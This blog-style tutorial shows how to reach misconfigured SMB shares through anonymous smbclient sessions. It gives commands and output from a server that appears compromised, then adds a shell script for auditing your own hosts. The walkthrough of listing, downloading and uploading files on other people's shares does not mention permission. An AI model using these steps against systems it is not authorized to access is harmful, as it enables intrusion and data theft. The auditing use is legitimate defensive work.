What's an SMB?
SMB, which stands for Server Message Block, is a protocol for sharing files, printers, serial ports and communications abstractions such as named pipes and mail slots between computers.
SMB is a client-server, request-response protocol. The only exception to the request-response nature of SMB (that is, where the client makes requests and the server sends back responses), is when the client has requested opportunistic locks (oplocks) and the server, subsequently, has to break an already granted oplock because another client has requested a file open with a mode that's incompatible with the granted oplock. In this case, the server sends an unsolicited message to the client signalling the oplock break.
Servers make file systems and other resources (printers, mailslots, named pipes, APIs) available to clients on the network. Client computers may have their own hard disks, but they also want access to the shared file systems and printers on the servers.
(Samba.org)
Exploiting Badly Configured SMBs
What you'll need:
- A machine that can run smbclient command
- A vulnerable/poorly configured SMB machine (remote or local)
- SMB PORT: 445
Steps:
Check Sharenames
To view the SMB share names, use the command:
smbclient -L 192.168.25.1 -N
(192.168.25.1 is the IP of the vulnerable SMB server; -N suppresses the password prompt, so the listing is attempted as an anonymous session)
You'll get something like this:
```
WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

        Sharename       Type      Comment
        ---------       ----      -------
        arquivos        Disk
        IPC$            IPC       IPC Service (Samba Server 4.3.9-Ubuntu)
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

        Server               Comment
        ---------            -------
        SAMBA                Samba Server 4.3.9-Ubuntu

        Workgroup            Master
        ---------            -------
        COMPUTACAO           SAMBA
```
After doing that, you'll need to pick a Sharename, for example "arquivos" or "IPC$". I highly recommend picking one whose name doesn't contain the "$" symbol, because those are the ones you're most likely to have permissions on.
In this case, I'm going to pick "arquivos" as Sharename.
Finally:
smbclient //192.168.25.1/arquivos -N
And, that's pretty much it...
Now, if the host is badly misconfigured, you can list, download and upload files, etc.
Example:
```
WARNING: The "syslog" option is deprecated
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Tue Jul 19 09:12:48 2016
  ..                                  D        0  Fri May 22 09:25:21 2015
  html                                D        0  Fri Jul 15 03:48:38 2016
  codeigniter                         D        0  Fri Jul  3 17:00:48 2015
  serverconfig.php                    A   100402  Fri Jul 15 03:48:46 2016
  phpmyadmin                          D        0  Fri May 22 16:28:47 2015
  khy                                AR        0  Tue Jul 19 09:12:48 2016
  cgitelnet1                          D        0  Fri Jul 15 05:40:41 2016
  supp1.1                             D        0  Tue Jul  7 19:35:09 2015
  index.html                          N      142  Tue May 10 16:30:59 2016
  teste.php                           A       21  Fri May 22 11:56:35 2015
  enxjdf.exe                          N   571074  Mon Apr 14 16:06:33 2008
  cherno.php                          N   210752  Fri Jul 15 05:13:46 2016

                151380148 blocks of size 1024. 132224492 blocks available
smb: \>
```
You can view all the smbclient commands by typing "?":

```
smb: \> ?
?              allinfo        altname        archive        backup
blocksize      cancel         casesensitive  cd             chmod
chown          close          del            dir            du
echo           exit           get            getfacl        geteas
hardlink       help           history        iosize         lcd
link           lock           lowercase      ls             l
mask           md             mget           mkdir          more
mput           newer          notify         open           posix
posixencrypt   posixopen      posixmkdir     posixrmdir     posixunlink
print          prompt         put            pwd            q
queue          quit           readlink       rd             recurse
reget          rename         reput          rm             rmdir
showacls       setea          setmode        scopy          stat
symlink        tar            tarmode        timeout        translate
unlock         volume         vuid           wdel           logon
listconnect    showconnect    tcon           tdis           tid
logoff         ..             !
```
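As an added example (not part of the original post, and not the author's script), here is a small POSIX shell audit that turns the steps above into a check you can run against your own server: it parses the `smbclient -L` listing, keeps the disk shares whose names don't end in "$", and tries each one with an anonymous `-N` session, reporting which ones let a null session in. The function names, the `audit_host` host argument and the embedded sample listing are my own constructions; the live check only runs when smbclient is installed.

```shell
# Added example: audit a host for shares that an anonymous (null session, -N)
# smbclient can list and open. Function names and the sample are constructed.

# Constructed sample of "smbclient -L <host> -N" output, modelled on the listing above.
sample_listing() {
    cat <<'EOF'
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]

        Sharename       Type      Comment
        ---------       ----      -------
        arquivos        Disk
        IPC$            IPC       IPC Service (Samba Server 4.3.9-Ubuntu)
        print$          Disk      Printer Drivers
        hp_lj           Printer   Office printer
Domain=[COMPUTACAO] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
EOF
}

# stdin: smbclient -L output; stdout: "<sharename> <type>" for each share row.
parse_shares() {
    awk '
        /^[[:space:]]*Sharename[[:space:]]+Type/ { in_table = 1; next }
        in_table && /^[[:space:]]*-+[[:space:]]+-+/ { next }       # header underline
        in_table && $2 ~ /^(Disk|IPC|Printer)$/ { print $1, $2; next }
        { in_table = 0 }                                            # anything else ends the table
    '
}

# Keep only disk shares whose name does not end in "$" (IPC$/print$ are not file shares).
anonymous_candidates() {
    awk '$2 == "Disk" && $1 !~ /\$$/ { print $1 }'
}

# Live check against your own server: list shares anonymously, then try to open
# each candidate with a null session (-N) and report the result.
audit_host() {
    host=$1
    if ! command -v smbclient >/dev/null 2>&1; then
        echo "smbclient not installed; cannot audit $host" >&2
        return 2
    fi
    smbclient -L "$host" -N 2>/dev/null | parse_shares | anonymous_candidates |
    while read -r share; do
        if smbclient "//$host/$share" -N -c 'ls' >/dev/null 2>&1; then
            echo "//$host/$share: anonymous access ALLOWED - restrict this share"
        else
            echo "//$host/$share: anonymous access denied"
        fi
    done
}
```

Run it as `audit_host 192.168.25.1` against a server you administer; any line reporting ALLOWED is a share that a client with no credentials can browse.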
I made a Python script that does all the hard work; if you want, you can get it here.